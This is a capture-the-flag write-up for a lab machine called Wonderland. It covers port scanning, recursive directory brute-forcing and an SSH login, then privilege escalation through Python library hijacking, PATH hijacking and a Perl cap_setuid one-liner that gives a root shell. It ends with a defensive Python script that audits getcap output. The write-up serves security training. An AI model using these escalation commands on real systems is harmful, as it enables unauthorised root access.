# Wonderland

## Scanning

### Nmap

```
$ nmap -sV -sC 10.10.59.87       

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST
Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:F4:A0:15:1D:53 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

```

## Enumeration

### Gobuster

```
$ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.59.87
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/02 00:03:13 Starting gobuster
===============================================================
/img (Status: 301)
/poem (Status: 301)
/r (Status: 301)
===============================================================
2021/10/02 00:03:14 Finished
===============================================================
```

`/img` and `/poem` contain nothing interesting (no binaries).

Check `/r`:

![](/files/-MkyRePWmCXr0M7OYqRH)

We will use the same gobuster command, appending each newly found directory to the URL.

In this case we will use an alphabet wordlist:

```
$ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt
/a
$ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt
/i
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt
/t
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt
```

The end: nowhere left to go.

Open `http://10.10.59.87/r/a/b/b/i/t` in a browser.

![](/files/-MkyRoM-uNRXusUtpNLY)

**view source**

![](/files/-MkyRxEl42sMmOpJG9Jz)

## Initial Access

SSH to the target using these credentials.

* [x] User Shell "Alice"

## Privilege Escalation

### Horizontal Escalation to Rabbit

Check whether alice has any sudo privileges:

```
alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

alice can run the script **walrus\_and\_the\_carpenter.py** with **rabbit**'s privileges.

Check **walrus\_and\_the\_carpenter.py**: the code uses a **Python library** called **random**.

![](/files/-MkyTNo6aZZu5K0VQfjB)

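So let's hijack this library. Python searches the script's own directory (here `/home/alice`) before the standard library, so a `random.py` placed there is imported instead of the real module.

To learn more about Python library hijacking, see this [article](https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/).

Create a fake library with the same name: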

```
alice@wonderland:~$ echo "import os
os.system('/bin/bash')" > random.py
```

Run **walrus\_and\_the\_carpenter.py** with rabbit's privileges:

```
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ 
```

* [x] User Shell "rabbit"

### Horizontal Escalation to Hatter

Check the home directory: `teaParty` is here.

Run it:

![](/files/-MkyUQjbG3tzpuEr1gLb)

It seems to call the `date` command by name, so the lookup goes through `PATH`.

* Write the command you want to execute in a file with the same name
* Export that file's directory at the front of the `PATH` variable
* Run the script

```
rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date 
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ pwd
/home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter
```

* [x] User Shell "hatter"

In this directory you can find `password.txt`.

Log in over SSH as hatter.

### Vertical Escalation to Root

Check capabilities:

```
hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```

Perl has `cap_setuid+ep`, so it can set its own UID to 0.

Check GTFOBins:

```
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
```

* [x] Root Shell
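
An audit for the finding above, as an added example that is not part of the original write-up: it parses `getcap -r` output and flags binaries holding high-risk capabilities in their effective set, rating script interpreters highest. The `HIGH_RISK` set, the interpreter list and the function names are choices made for this example; the sample is the output shown in the session above.

```python
import re

# Capabilities that allow taking over other accounts or bypassing file
# permissions (a selection made for this example, not an exhaustive list).
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}
# Programs that execute caller-supplied code; a version suffix is allowed.
INTERPRETER = re.compile(r"^(perl|python|ruby|php|node|lua|gdb)[\d.]*$")
CLAUSE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]+)$")

# getcap output copied from the session above.
SAMPLE = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""


def parse_getcap(text):
    """Yield (path, {capability: flags}) for each line of `getcap -r` output."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        # Older libcap prints "path = caps"; newer releases print "path caps".
        # The second form is split at the first space (paths without spaces).
        path, _, caps = line.partition(" = ") if " = " in line else line.partition(" ")
        granted = {}
        for clause in caps.split():
            m = CLAUSE.match(clause)
            if m:
                for cap in m.group(1).split(","):
                    granted[cap] = m.group(2)
        yield path, granted


def findings(text):
    """Return (severity, path, capabilities) for each risky binary."""
    out = []
    for path, granted in parse_getcap(text):
        risky = sorted(c for c, f in granted.items() if c in HIGH_RISK and "e" in f)
        if risky:
            name = path.rsplit("/", 1)[-1]
            out.append(("critical" if INTERPRETER.match(name) else "review", path, risky))
    return out


if __name__ == "__main__":
    for row in findings(SAMPLE):
        print(row)
```

A capability that is not needed can be removed from a binary with `setcap -r <path>`.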

